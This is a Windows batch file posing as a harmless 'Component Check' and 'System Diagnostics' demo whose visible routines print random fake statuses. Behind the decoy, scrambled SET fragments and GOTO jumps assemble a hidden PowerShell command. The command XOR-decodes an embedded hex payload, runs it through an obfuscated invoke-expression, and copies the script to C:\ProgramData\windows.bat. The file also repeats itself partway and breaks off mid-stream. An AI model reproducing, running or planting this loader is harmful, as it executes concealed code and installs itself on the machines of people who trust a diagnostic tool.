@echo off




setlocal EnableDelayedExpansion

echo.

goto :skipCheck

:: ======================================
:: Component Check - DEMO ONLY
:: ======================================

:CheckRoutine
title Component Check
color BE

echo Starting Component Check session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,3) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

timeout /t 2 >nul

for %%A in (
    Power
    SATA
    Graphics
    Cooling
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

timeout /t 1 >nul

for %%S in (
    POP3
    FTP
    DHCP
    RDP
) do (
    set /a state=!random! %% 2
    if !state! EQU 0 (
        echo %%S ........ ONLINE
    ) else (
        echo %%S ........ STANDBY
    )
)

echo Scan completed.
pause
goto :eof

:skipCheck
:: ======================================
:: END OF COMPONENT CHECK BLOCK
:: ======================================

goto :skipVerify

:: ======================================
:: System Diagnostics - DEMO ONLY
:: ======================================

:VerifyRoutine
title System Diagnostics
color 3C

echo Starting System Diagnostics session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,6) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

echo.
echo Collecting statistics...
timeout /t 2 >nul

for %%A in (
    Cooling
    USB
    Network
    CPU
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

echo Check finished.
pause
goto :eof

:skipVerify
:: ======================================
:: END OF SYSTEM DIAGNOSTICS BLOCK
:: ======================================
GOTO IJFDGDNJND
:NGNDFUFFGD
SET OSOGJNOION=SATMjT9AwTDMCAAxpxppDx9xCwwA9pujTAS5TMSwVj3TwwTTp5p5DMvpxwwxCMSxuwVj3TMMxpw
GOTO IGSSGFDFDN
:OGDJDSJSGN
SET DIJDGIJDGG=k[$eCdJUq])*16+$a9VGl7MV.IndexOf($rpJBnO2Vk[$eCdJUq+1]);if($jdeE08bC
GOTO OIGNGKDGGS8
:GGDDJFHIDF
SET OFFONOOIDO=x35SAC59A95uAjwwTC5MMCTVx3MTjAACjCA35TAMAVjj5DpwTvA5TwA9ASjpAD5w5pppjv55A
GOTO FIOGKGSJFO
:IOIIJIFIGS
SET DDDDOFONSN=l.exe -WindowStyle Hidden -ArgumentList '-Command \"$j=41-38;$mKGbmLPY5=''whVx
GOTO KFIOOUNUOG
:NODIHOFNGD
SET IOFNSNDGIG=V3vAvjVAv3SV9xDvDTCpuAvSVvVTDADAVpDVvwCAV33xCpuAvuVTVxvAD395SVDwCj3Su5
GOTO OIGNGKDGGS0
:GKOFFDFNJO
SET OJDSNIGOOG=fYxBV=@();foreach($d1sCbL8 in [char[]]$mKGbmLPY5){$bfYxBV+=[byte]($d1sCb
GOTO OODGIDOUID
:OGGFDOKNNO
SET IJNUDNODOJ=j3Ajw5Tx5ujpjMAVjvjpp5jxxVxTjV5DjvpA5vppp95C5DAVA3TD5x5ppVjuAwjxA5jMjMjxASjM5CT
GOTO NGNDFUFFGD
:GFOKINNGDD
SET FNGGIGGFFH=AujVjuApwp5xjVpVjMApjxpxAvApjD55ASwVjMASA9jjpA555upSAj5VpDpTMuwSwxTSM
GOTO IOUGFJODKI
:ONIHKNGJGG
SET NGJKNDDNFI=($yJEvwYG2-bxor$gavMZog[$jdeE08bC]);$jdeE08bC++;$eCdJUq+=2};$ko
GOTO UDDNGGUIFD4
:GONIJNGNGF
SET GODOFSSDUI=94C;$bfYxBV=@();foreach($d1sCbL8 in [char[]]$mKGbmLPY5){$bfYxBV+=
GOTO OIGNGKDGGS2
:DOGKGIFGDS
SET SIGSJKDFGN=-Process $env:SystemRoot\System32\WindowsPowerShell\v1.0\powershel
GOTO IOIIJIFIGS
:DOGKGIFGDS5
SET IFIGFOGFIO=VDCwD99TDM9jDjCSuCS5VAuS9wVSuV359wuDSuSV3S95SwSTSuuxuDSvu5SVST9j
GOTO DOGKGIFGDS6
:OODGIDOUID
SET NFIDDNODDN=L8-bxor0x3C)};$zxQ0r4aXt=$bfYxBV;$nHJ2dw='''';$eCdJUq=0;$jdeE08bC=0;whil
GOTO OIGNGKDGGS6
:IOIIJIFIGS8
SET UFJOSFFIIG=jAA5AV5SjTpwTwxMTuwpwVTx5A5upApjjx5DpDjpAMTupxADTAMApuMCAAjV5MASjx5
GOTO IOIIJIFIGS9
:IOIIJIFIGS3
SET NDNDSOISJN=TwxuM3pvpvju5A5TAppMjM59ASj95ST5M5MjAjjA5TpSAVTMAApwjx5ST3AvAwjSjVT3wu53ACAjMjT
GOTO IOIIJIFIGS4
:FHDIDNIHGG
SET OGDOKDHNNG=pSuSwDwujDuvMVCvMVV39CjSvvpVDvuuMD9VC3TvT3SDSuVSCSv9vCASVDuDM3TD5
GOTO DGIJOOGFII
:IOIIJIFIGS7
SET FNOGNOOGOJ=vpSjD5uj9MxADxvwwx5MDjCjwjApw5pxAj3Ajw3xVMDApA3A3jMjpw55VxwxTpxpV5ppS
GOTO IOIIJIFIGS8
:JDGDFIGNOF
SET NJIDFHFKOG=9uVCpSDuA3DSjCACDSDujSVCw9A93uVVA3wvAS3STu5CVuMC9SvSw93CvuCuA
GOTO DOGKGIFGDS0
:OOOJIDNNDI
SET GDDDFDJNDF=yContinue
GOTO GUFGHIIFGO
:ONFISDOFNG
SET FGJNJJGIIJ=35VMDADMV9uTvVvMDuvj39v3v5VV3vDMVx3AupDuVD3SDDv99juVCMSw95STSVDpVV9
GOTO IIGODGDIOO
:NIHGOOGOGN
SET JOJINNKDJJ=9j9jCDS99VC9SpuD3CVpDCVDvjuC9jDpVv3u3uV39TD5Dj3Tv9VCDxDwDMVxuwDSV3v39xuwC3uu
GOTO NSFDDUIIIO7
:GIDFSHDOOJ
SET NODDOJGJDS=3AxTCpDwwpjjwTAAC5wjVAV5TMTwAjSjMwvTp5p53pSwAT9AwTvwDwVjvTuwwp55w
GOTO GGDDJFHIDF
:SDIGSFNFFS
SET GGOFUKHOOF=jAD5CjxjMppxjAC5uxMTAMSAxwDpD5DppAvMMAvpu5u5xTujvMvM5TpwSxxAwMuxT59puTuxp
GOTO OGGFDOKNNO
:NFGGDGGGDI
SET JIJFGJNIOO=jSCSA33SpuxDA9CCDuCuVCjSMvuvVvDCDV9VDCpuDVS3VuVSCSv9vC9C533SpuxDj9VC
GOTO IOFFIJSJGI
:FOIGDGFSFF
SET JOGGFIJUGI=CjwAx5CpCwwTC5MM3T9Tvj3AjwjxwMA5jwAwjpu5AASApjVx9ATp3TAMujCw
GOTO GIDFSHDOOJ
:OGFNSGKNFF
SET UFIDDJOIDS=99DVjD9CxVMVwDVuuS9DvuwvTvCvxVuCMv3u9uvSDSAupuC9MCjS93vC9SpuCv3Vu
GOTO FDSIFGGDJH
:ISIOIDISJF
SET JISDDIFFOD=V9DxuwSSV9uxCDSw9SDpv3SpV3VDCVD5DCVu3vDMvM95CvV3C5vp3xDAVjCj
GOTO NIHGOOGOGN
:DJIKGNDIOO
SET IGGISUNGGI=VTuSvCDjDCD93uvvupVVSv9vCwSA33SpVvDTuwSjuD3xSpCp3xC9SuCT9DuvC9V9vw
GOTO HFNNNNNJKK
:HFNNNNNJKK
SET GGFDJKSDOG=VD99CTvuuxSp35upVC3DvwujVCVA3TD9v33vD5vCu39p93VMDVVu9x9D3MvVVxVSDuSTV5
GOTO ISIOIDISJF
:IGSSGFDFDN
SET GFOGFGDJDN=x3jMMDjM5uAT5uAApwTDx55ujCjAwTMwM5T3MSx5MS555S5xpMj553j9MwjSjSjwpA5559x5
GOTO GFOKINNGDD
:DGIJOOGFII
SET KGGGGONFDJ=V5v9Vx9MCMvCDMv33jCj9v9jVwuDS5u59MCv3jVTDSvxC5Vju5CxvVv99juVCMSw95CASVDu
GOTO JJFGDNDINU
:IOIIJIFIGS2
SET GOOSGISFJN=CCxSuuxuxSCupDxujuAuAS33AvSDvD3vA9w9Cuv9C9V'';$sGPzI18=''5jjwpC
GOTO IOIIJIFIGS3
:IOUGFJODKI
SET NODOHJSJGF=uxvMvwwT5pDACjx5STvADMvTSj55VpTjxAC555DATAwMuw5jvpu5w5u53j3pvj5jM
GOTO UJIONSGUNG
:FIOGKGSJFO
SET NIFNNGJODI=3A3x3MjpTA3jTAj5DMTwDj35CASjxpwTAAxASpuADAAjw53puTAjTAuAxwxjDj
GOTO SDIGSFNFFS
:NDNJDFDNFO
SET SNIOGDDGID=q-lt$otT3XBV.Length){$yJEvwYG2=$a9VGl7MV.IndexOf($otT3XBV[$eCdJUq])*16+$a9
GOTO ODGDGSDFNI
:IOIIJIFIGS1
SET SSIKHJIDNN=vjSSu9CwSv9SDSSSCjVxSMCSDVvjSpuv9puCuC3xDSC9CC9jSDSMvxSpuxS9S5S9uAujSTCjujuw9
GOTO IOIIJIFIGS2
:DOGKGIFGDS3
SET HIGFNSNOOF=vpCxuCu5ujSvS5DD9wDuCjCjC3Cw9SCVDVuM99Cp9VSj9SuMVM33CwC9uv3AS395Cu9CuVDvCCu5CCu
GOTO DOGKGIFGDS4
:DOGKGIFGDS7
SET DGGGIIDGGG=wVS9S3C9CCSSxuMS99CSvvvuS9TSSu9upD3uxSj9CSA99SVvVC3SwVMSjS39
GOTO DOGKGIFGDS8
:DOGKGIFGDS0
SET OODKNSGUNJ=3AS5S33TDxVu9j999A9CDDSVuD3AC3Cx9CCS9M93SA9D9CCv9VuA3S9VCuuTSCCAD5v3SpuxSTV
GOTO DOGKGIFGDS1
:NIOGFGJGNG
SET OGOFIKGSDD=' -Destination 'C:\ProgramData\windows.bat' -Force -ErrorAction Silentl
GOTO OOOJIDNNDI
:JJFGDNDINU
SET JNFJNFFFDF=DM3TD5V5v9Vx9MCM3C3wDvV5D5u5uv99STSvuC9MCjVv3Tv3SMuw3VVuD5V3D33u
GOTO NODIHOFNGD
:OFGOGINGUD
SET FJOISOOOIJ=MwDjuT5x9w55CxMTuwwwxAjjM5DAxpj5C5Dp9j55xT5595M59AjpSwuMTpx5DpDjpApxSppA
GOTO FOIGDGFSFF
:DOGKGIFGDS2
SET SGIFNIFDGN=39SC99VuwuT9MSVDvSvuwVCSSSVuC93CVCA9p9C3T35SpCA9DS3S9DuCV9MCv
GOTO DOGKGIFGDS3
:KFIOOUNUOG
SET IDISGGSKOD=m1OFuIoJP'';$a9VGl7MV=''3VDv9uCSAp5jMwxT'';$rpJBnO2Vk=''9j9SCD9V9v3D
GOTO NSFDDUIIIO
:IOIIJIFIGS5
SET GIKSDIODDD=xpwpMjM55wjTp5p5Sw5M5TpMuMSxupv5S5vp35p5VTjA9Mvj9M9xxAxMCxvx9AATp5p5SwAwxpxApj
GOTO IOIIJIFIGS6
:GUFGHIIFGO
%HJNIFSOHNJ%%SIGSJKDFGN%%DDDDOFONSN%%IDISGGSKOD%%FDGFIDNFFN%%NDDDODOGNI%%NSDFNISGDO%%NKODOOOSGF%%DOINJHDNGJ%%NJIDFHFKOG%%OODKNSGUNJ%%GNGJGGFDOG%%SGIFNIFDGN%%HIGFNSNOOF%%NNDNGJJOJH%%IFIGFOGFIO%%FNDDNJOJFG%%DGGGIIDGGG%%JIGFSGNNSF%%GGUKJDKGGO%%INIGGGONID%%SSIKHJIDNN%%GOOSGISFJN%%NDNDSOISJN%%GDKDFJOOGG%%GIKSDIODDD%%UONJNGGGGK%%FNOGNOOGOJ%%UFJOSFFIIG%%DJOISIGJFF%%FJOISOOOIJ%%JOGGFIJUGI%%NODDOJGJDS%%OFFONOOIDO%%NIFNNGJODI%%GGOFUKHOOF%%IJNUDNODOJ%%OSOGJNOION%%GFOGFGDJDN%%FNGGIGGFFH%%NODOHJSJGF%%JIJGIJJKFU%%HUIOGJGOFN%%IGGISUNGGI%%GGFDJKSDOG%%JISDDIFFOD%%JOJINNKDJJ%%OJGIDGDGGI%%UNKONDUIIS%%FGJNJJGIIJ%%GISJONUJSD%%JIJFGJNIOO%%OONGODOOUI%%UFIDDJOIDS%%NJJGNDFOHI%%HFNDKFUONN%%OGDOKDHNNG%%KGGGGONFDJ%%JNFJNFFFDF%%IOFNSNDGIG%%DDOIGFGIGS%%GODOFSSDUI%%JFNHNGIFGI%%DFOOJKNGOK%%OJDSNIGOOG%%NFIDDNODDN%%JUIIGDFSOO%%DIJDGIJDGG%%GNDKSJSFFN%%GHNJGFHSDS%%JSIIGJHSOF%%OGDGNFNOIN%%NOGJGDOOOS%%NGJKNDDNFI%%DDFFFFFINO%%SNIOGDDGID%%DSIJIOFUGD%%SGIOINGNJD%%HNOGISNNJS%%NNGDFNSDON%%OGOFIKGSDD%%GDDDFDJNDF%
GOTO OFDNGISFDG3
:GIOODOIOGS
SET NOGJGDOOOS=[$eCdJUq+1]);if($jdeE08bC-ge$gavMZog.Length){$jdeE08bC=0};$nHJ2dw+=[char]
GOTO ONIHKNGJGG
:DOGKGIFGDS8
SET JIGFSGNNSF=AujuuuwuT9TuvvT9SSjujC5Cv9CS5SxCuCDuCuADASA9xuTS3S9DpCj9AC99C
GOTO DOGKGIFGDS9
:GDGIOIJDSG
SET NNGDFNSDON=[char[]](105,101,120)-join'''') $fjB77Bh\"'" ; Copy-Item -Path '%~f0
GOTO NIOGFGJGNG
:FFSNDSOGDD
SET GHNJGFHSDS=4ig[$jdeE08bC]);$jdeE08bC++;$eCdJUq+=2};$ua8qJoqu=$nHJ2dw;$nH
GOTO UDDNGGUIFD0
:FDSIFGGDJH
SET NJJGNDFOHI=DS3vvC39VAVCCxu33DDvCDVxvADA3CvC93uAVAD3VADwvTC5ujux39V9DSVu39DxDSvVSu3MD9u5
GOTO IJOIDDIDDS5
:OIGNGKDGGS
SET NSDFNISGDO=jupu99VSA9Su59uuCSv9VCuu3CDSxS33AvCC99u39SAux9xC3u3DCvxSx9CSx9j
GOTO UDDNGGUIFD
:OIGNGKDGGS8
SET GNDKSJSFFN=-ge$rd1X4ig.Length){$jdeE08bC=0};$nHJ2dw+=[char]($yJEvwYG2-bxor$rd1X
GOTO FFSNDSOGDD
:UJIONSGUNG
SET JIJGIJJKFU=px53wuj55S5SAvpA5Mpwp3pA5SjV5v5pMw'';$otT3XBV=''CDSw9CCMSpuD3
GOTO NSFDDUIIIO2
:NGOSGSIIKG
SET OGDGNFNOIN=wYG2=$a9VGl7MV.IndexOf($sGPzI18[$eCdJUq])*16+$a9VGl7MV.IndexOf($sGPzI18
GOTO GIOODOIOGS
:OIGNGKDGGS6
SET JUIIGDFSOO=e($eCdJUq-lt$rpJBnO2Vk.Length){$yJEvwYG2=$a9VGl7MV.IndexOf($rpJBnO2V
GOTO OGDJDSJSGN
:IJFDGDNJND
SET HJNIFSOHNJ=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Start
GOTO DOGKGIFGDS
:IIGODGDIOO
SET GISJONUJSD=pCp9ASvuD3xSAS5vpvVvvSx3S3AD3Vjv9uxuMCSS99xDCCDDvvTVTDSVDDSVx9MCCS9u
GOTO NFGGDGGGDI
:IOIIJIFIGS0
SET INIGGGONID=uD9SvpSxDwVx9puxST9D9p3VuCVDCD3SCuDx9xuCuVSvuMVx95v9S5CTvVDwSpVxC9SAu9
GOTO IOIIJIFIGS1
:IOFFIJSJGI
SET OONGODOOUI=xuxvvvxvS3uDvvpDwu9DTSpVVVMDDD53w3xvx3DCAupvCvDVvDSS9uT9MC3S
GOTO OGFNSGKNFF
:DOGKGIFGDS6
SET FNDDNJOJFG=STCv95Cj9vup99S9u5vpDDSpC59VuVu99w9uSpuCVvSpDMuCDTSpDCuVuVSx9MuSuj95u9vVSAD
GOTO DOGKGIFGDS7
:DOGKGIFGDS1
SET GNGJGGFDOG=v3uCCVTvA9xD33uDwDDSD9SCT9wu33vvuvjSASxCTCSux9V95uAS5CV3SCSuASpupS
GOTO DOGKGIFGDS2
:NSFDDUIIIO
SET FDGFIDNFFN=S5SD3T9M93SvCu95u5D93Cu3vASMvuu9vSuxDwvMVT3puSSV9xVACVSp9DvwCVS
GOTO IJOIDDIDDS
:ODGDGSDFNI
SET DSIJIOFUGD=VGl7MV.IndexOf($otT3XBV[$eCdJUq+1]);if($jdeE08bC-ge$zxQ0r4aXt.Length)
GOTO UDDNGGUIFD7
:UDDNGGUIFD
SET NKODOOOSGF=up3MvwvA9A93uMvpSC3A9pDASwV53pCwSvuwvSuxCwDv399T3VDAv5CV9CCA9
GOTO OFDNGISFDG
:IOIIJIFIGS4
SET GDKDFJOOGG=vATTVpxj359px5vAVpDT5pCj3jD5CxDATpV59jVT3wujv535DpxpT5pxSATwux9jTj
GOTO IOIIJIFIGS5
:UDDNGGUIFD8
SET HNOGISNNJS=;$eCdJUq+=2};$vgLD1KnP=$nHJ2dw;$fjB77Bh=$ua8qJoqu+$kojswu+$vgLD1KnP;.(
GOTO GDGIOIJDSG
:UDDNGGUIFD0
SET JSIIGJHSOF=J2dw='''';$eCdJUq=0;$jdeE08bC=0;while($eCdJUq-lt$sGPzI18.Length){$yJEv
GOTO NGOSGSIIKG
:NSFDDUIIIO7
SET OJGIDGDGGI=SAuC99V9DV3pDjvCCuuvuwDMVDVDvS9jCDSwVV9pujDwuvuxDj9CSv9j9MCv3jVTDSvxC5
GOTO NSFDDUIIIO8
:DOGKGIFGDS4
SET NNDNGJJOJH=j9Cu53Au39xVMSCSwCAuASS33CSCxSv3SCDuVSASTSSSjuTu59CS99vu3u5CC9pCpC3SjSC9jV9uMup
GOTO DOGKGIFGDS5
:OIGNGKDGGS3
SET DFOOJKNGOK=in [char[]]$mKGbmLPY5){$bfYxBV+=[byte]($d1sCbL8-bxor0xA5)};$gavMZog=$bfYxBV;$b
GOTO GKOFFDFNJO
:NSFDDUIIIO8
SET UNKONDUIIS=Vju5CxDCvADMDS3xVDv3VwvSvMVTVMVTDvvMD9DT35CMDS3VV3vwv9vT3AVDVMvDV9
GOTO ONFISDOFNG
:IOIIJIFIGS9
SET DJOISIGJFF=3xTpSpx5wxVM3ApA3jM5xASj95ST5M5A5TAMA5jwMwpTC5MMSTVxMTuwTMTT9AwT
GOTO OFGOGINGUD
:NSFDDUIIIO2
SET HUIOGJGOFN=CVpDCVDvjuC9jVwvTV53T3uC5DDDA3MD9CjvpDTVpVuv53S33CDDDvx3A9wVxvvDwD33CvMSu
GOTO DJIKGNDIOO
:IJOIDDIDDS
SET NDDDODOGNI=uSDupVM9p9Mu939SVSu9VS9CAD5v3SACC95V5VpDMS3CASMCS9SSpC995V5uS939xVTS39SSD9xVw9
GOTO OIGNGKDGGS
:DOGKGIFGDS9
SET GGUKJDKGGO=CxCwD5D3DASwuu3uuwCjCA9DCDSS3SvDupSASSDDCvuvuD9p3Sup9xSpu5S399uj9puVDDCuSwCVvw
GOTO IOIIJIFIGS0
:OFDNGISFDG
SET DOINJHDNGJ=xCV9Vvwup9VuSCpuDVS9C9CSp9MSMujS9Sp3w3V3VDACMDuS3CA3V93u3CDSM9
GOTO JDGDFIGNOF
:UDDNGGUIFD7
SET SGIOINGNJD={$jdeE08bC=0};$nHJ2dw+=[char]($yJEvwYG2-bxor$zxQ0r4aXt[$jdeE08bC]);$jdeE08bC++
GOTO UDDNGGUIFD8
:OIGNGKDGGS0
SET DDOIGFGIGS=3SV9vxVv933A39vTC9DM33SpSS9vuuSvuC9MCjS995C9SVDw'';$uvewA5pR=0xFA91-0x1
GOTO GONIJNGNGF
:UDDNGGUIFD4
SET DDFFFFFINO=jswu=$nHJ2dw;$nHJ2dw='''';$eCdJUq=0;$jdeE08bC=0;while($eCdJU
GOTO NDNJDFDNFO
:OIGNGKDGGS2
SET JFNHNGIFGI=[byte]($d1sCbL8-bxor0x5A)};$rd1X4ig=$bfYxBV;$bfYxBV=@();foreach($d1sCbL8 
GOTO OIGNGKDGGS3
:IOIIJIFIGS6
SET UONJNGGGGK=wMDj5j35SpCjxjMj959AC59MDpwA5pSpV5Vp5jA5Cx3wVMjpSApjxMD5Sjv5
GOTO IOIIJIFIGS7
:IJOIDDIDDS5
SET HFNDKFUONN=u5CwVSCSuC99V9DV3pDjvCCuuvuwVwv3DSDSvAVxC9uSCvSADwvvuDCwVSC3u59MCTvuu
GOTO FHDIDNIHGG
:OFDNGISFDG3@echo off




setlocal EnableDelayedExpansion

echo.

goto :skipCheck

:: ======================================
:: Component Check - DEMO ONLY
:: ======================================

:CheckRoutine
title Component Check
color BE

echo Starting Component Check session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,3) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

timeout /t 2 >nul

for %%A in (
    Power
    SATA
    Graphics
    Cooling
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

timeout /t 1 >nul

for %%S in (
    POP3
    FTP
    DHCP
    RDP
) do (
    set /a state=!random! %% 2
    if !state! EQU 0 (
        echo %%S ........ ONLINE
    ) else (
        echo %%S ........ STANDBY
    )
)

echo Scan completed.
pause
goto :eof

:skipCheck
:: ======================================
:: END OF COMPONENT CHECK BLOCK
:: ======================================

goto :skipVerify

:: ======================================
:: System Diagnostics - DEMO ONLY
:: ======================================

:VerifyRoutine
title System Diagnostics
color 3C

echo Starting System Diagnostics session...
timeout /t 1 >nul

echo Verifying system components...
timeout /t 1 >nul

for /L %%i in (1,1,6) do (
    set /a percent=!random! %% 100
    echo Component %%i ........ !percent!%%
    timeout /t 1 >nul
)

echo.
echo Collecting statistics...
timeout /t 2 >nul

for %%A in (
    Cooling
    USB
    Network
    CPU
) do (
    set /a score=!random! %% 100
    echo %%A Status: !score!%%
)

echo Check finished.
pause
goto :eof

:skipVerify
:: ======================================
:: END OF SYSTEM DIAGNOSTICS BLOCK
:: ======================================
GOTO IJFDGDNJND
:NGNDFUFFGD
SET OSOGJNOION=SATMjT9AwTDMCAAxpxppDx9xCwwA9pujTAS5TMSwVj3TwwTTp5p5DMvpxwwxCMSxuwVj3TMMxpw
GOTO IGSSGFDFDN
:OGDJDSJSGN
SET DIJDGIJDGG=k[$eCdJUq])*16+$a9VGl7MV.IndexOf($rpJBnO2Vk[$eCdJUq+1]);if($jdeE08bC
GOTO OIGNGKDGGS8
:GGDDJFHIDF
SET OFFONOOIDO=x35SAC59A95uAjwwTC5MMCTVx3MTjAACjCA35TAMAVjj5DpwTvA5TwA9ASjpAD5w5pppjv55A
GOTO FIOGKGSJFO
:IOIIJIFIGS
SET DDDDOFONSN=l.exe -WindowStyle Hidden -ArgumentList '-Command \"$j=41-38;$mKGbmLPY5=''whVx
GOTO KFIOOUNUOG
:NODIHOFNGD
SET IOFNSNDGIG=V3vAvjVAv3SV9xDvDTCpuAvSVvVTDADAVpDVvwCAV33xCpuAvuVTVxvAD395SVDwCj3Su5
GOTO OIGNGKDGGS0
:GKOFFDFNJO
SET OJDSNIGOOG=fYxBV=@();foreach($d1sCbL8 in [char[]]$mKGbmLPY5){$bfYxBV+=[byte]($d1sCb
GOTO OODGIDOUID
:OGGFDOKNNO
SET IJNUDNODOJ=j3Ajw5Tx5ujpjMAVjvjpp5jxxVxTjV5DjvpA5vppp95C5DAVA3TD5x5ppVjuAwjxA5jMjMjxASjM5CT
GOTO NGNDFUFFGD
:GFOKINNGDD
SET FNGGIGGFFH=AujVjuApwp5xjVpVjMApjxpxAvApjD55ASwVjMASA9jjpA555upSAj5VpDpTMuwSwxTSM
GOTO IOUGFJODKI
:ONIHKNGJGG
SET NGJKNDDNFI=($yJEvwYG2-bxor$gavMZog[$jdeE08bC]);$jdeE08bC++;$eCdJUq+=2};$ko
GOTO UDDNGGUIFD4
:GONIJNGNGF
SET GODOFSSDUI=94C;$bfYxBV=@();foreach($d1sCbL8 in [char[]]$mKGbmLPY5){$bfYxBV+=
GOTO OIGNGKDGGS2
:DOGKGIFGDS
SET SIGSJKDFGN=-Process $env:SystemRoot\System32\WindowsPowerShell\v1.0\powershel
GOTO IOIIJIFIGS
:DOGKGIFGDS5
SET IFIGFOGFIO=VDCwD99TDM9jDjCSuCS5VAuS9wVSuV359wuDSuSV3S95SwSTSuuxuDSvu5SVST9j
GOTO DOGKGIFGDS6
:OODGIDOUID
SET NFIDDNODDN=L8-bxor0x3C)};$zxQ0r4aXt=$bfYxBV;$nHJ2dw='''';$eCdJUq=0;$jdeE08bC=0;whil
GOTO OIGNGKDGGS6
:IOIIJIFIGS8
SET UFJOSFFIIG=jAA5AV5SjTpwTwxMTuwpwVTx5A5upApjjx5DpDjpAMTupxADTAMApuMCAAjV5MASjx5
GOTO IOIIJIFIGS9
:IOIIJIFIGS3
SET NDNDSOISJN=TwxuM3pvpvju5A5TAppMjM59ASj95ST5M5MjAjjA5TpSAVTMAApwjx5ST3AvAwjSjVT3wu53ACAjMjT
GOTO IOIIJIFIGS4
:FHDIDNIHGG
SET OGDOKDHNNG=pSuSwDwujDuvMVCvMVV39CjSvvpVDvuuMD9VC3TvT3SDSuVSCSv9vCASVDuDM3TD5
GOTO DGIJOOGFII
:IOIIJIFIGS7
SET FNOGNOOGOJ=vpSjD5uj9MxADxvwwx5MDjCjwjApw5pxAj3Ajw3xVMDApA3A3jMjpw55VxwxTpxpV5ppS
GOTO IOIIJIFIGS8
:JDGDFIGNOF
SET NJIDFHFKOG=9uVCpSDuA3DSjCACDSDujSVCw9A93uVVA3wvAS3STu5CVuMC9SvSw93CvuCuA
GOTO DOGKGIFGDS0
:OOOJIDNNDI
SET GDDDFDJNDF=yContinue
GOTO GUFGHIIFGO
:ONFISDOFNG
SET FGJNJJGIIJ=35VMDADMV9uTvVvMDuvj39v3v5VV3vDMVx3AupDuVD3SDDv99juVCMSw95STSVDpVV9
GOTO IIGODGDIOO
:NIHGOOGOGN
SET JOJINNKDJJ=9j9jCDS99VC9SpuD3CVpDCVDvjuC9jDpVv3u3uV39TD5Dj3Tv9VCDxDwDMVxuwDSV3v39xuwC3uu
GOTO NSFDDUIIIO7
:GIDFSHDOOJ
SET NODDOJGJDS=3AxTCpDwwpjjwTAAC5wjVAV5TMTwAjSjMwvTp5p53pSwAT9AwTvwDwVjvTuwwp55w
GOTO GGDDJFHIDF
:SDIGSFNFFS
SET GGOFUKHOOF=jAD5CjxjMppxjAC5uxMTAMSAxwDpD5DppAvMMAvpu5u5xTujvMvM5TpwSxxAwMuxT59puTuxp
GOTO OGGFDOKNNO
:NFGGDGGGDI
SET JIJFGJNIOO=jSCSA33SpuxDA9CCDuCuVCjSMvuvVvDCDV9VDCpuDVS3VuVSCSv9vC9C533SpuxDj9VC
GOTO IOFFIJSJGI
:FOIGDGFSFF
SET JOGGFIJUGI=CjwAx5CpCwwTC5MM3T9Tvj3AjwjxwMA5jwAwjpu5AASApjVx9ATp3TAMujCw
GOTO GIDFSHDOOJ
:OGFNSGKNFF
SET UFIDDJOIDS=99DVjD9CxVMVwDVuuS9DvuwvTvCvxVuCMv3u9uvSDSAupuC9MCjS93vC9SpuCv3Vu
GOTO FDSIFGGDJH
:ISIOIDISJF
SET JISDDIFFOD=V9DxuwSSV9uxCDSw9SDpv3SpV3VDCVD5DCVu3vDMvM95CvV3C5vp3xDAVjCj
GOTO NIHGOOGOGN
:DJIKGNDIOO
SET IGGISUNGGI=VTuSvCDjDCD93uvvupVVSv9vCwSA33SpVvDTuwSjuD3xSpCp3xC9SuCT9DuvC9V9vw
GOTO HFNNNNNJKK
:HFNNNNNJKK
SET GGFDJKSDOG=VD99CTvuuxSp35upVC3DvwujVCVA3TD9v33vD5vCu39p93VMDVVu9x9D3MvVVxVSDuSTV5
GOTO ISIOIDISJF
:IGSSGFDFDN
SET GFOGFGDJDN=x3jMMDjM5uAT5uAApwTDx55ujCjAwTMwM5T3MSx5MS555S5xpMj553j9MwjSjSjwpA5559x5
GOTO GFOKINNGDD
:DGIJOOGFII
SET KGGGGONFDJ=V5v9Vx9MCMvCDMv33jCj9v9jVwuDS5u59MCv3jVTDSvxC5Vju5CxvVv99juVCMSw95CASVDu
GOTO JJFGDNDINU
:IOIIJIFIGS2
SET GOOSGISFJN=CCxSuuxuxSCupDxujuAuAS33AvSDvD3vA9w9Cuv9C9V'';$sGPzI18=''5jjwpC
GOTO IOIIJIFIGS3
:IOUGFJODKI
SET NODOHJSJGF=uxvMvwwT5pDACjx5STvADMvTSj55VpTjxAC555DATAwMuw5jvpu5w5u53j3pvj5jM
GOTO UJIONSGUNG
:FIOGKGSJFO
SET NIFNNGJODI=3A3x3MjpTA3jTAj5DMTwDj35CASjxpwTAAxASpuADAAjw53puTAjTAuAxwxjDj
GOTO SDIGSFNFFS
:NDNJDFDNFO
SET SNIOGDDGID=q-lt$otT3XBV.Length){$yJEvwYG2=$a9VGl7MV.IndexOf($otT3XBV[$eCdJUq])*16+$a9
GOTO ODGDGSDFNI
:IOIIJIFIGS1
SET SSIKHJIDNN=vjSSu9CwSv9SDSSSCjVxSMCSDVvjSpuv9puCuC3xDSC9CC9jSDSMvxSpuxS9S5S9uAujSTCjujuw9
GOTO IOIIJIFIGS2
:DOGKGIFGDS3
SET HIGFNSNOOF=vpCxuCu5ujSvS5DD9wDuCjCjC3Cw9SCVDVuM99Cp9VSj9SuMVM33CwC9uv3AS395Cu9CuVDvCCu5CCu
GOTO DOGKGIFGDS4
:DOGKGIFGDS7
SET DGGGIIDGGG=wVS9S3C9CCSSxuMS99CSvvvuS9TSSu9upD3uxSj9CSA99SVvVC3SwVMSjS39
GOTO DOGKGIFGDS8
:DOGKGIFGDS0
SET OODKNSGUNJ=3AS5S33TDxVu9j999A9CDDSVuD3AC3Cx9CCS9M93SA9D9CCv9VuA3S9VCuuTSCCAD5v3SpuxSTV
GOTO DOGKGIFGDS1
:NIOGFGJGNG
SET OGOFIKGSDD=' -Destination 'C:\ProgramData\windows.bat' -Force -ErrorAction Silentl
GOTO OOOJIDNNDI
:JJFGDNDINU
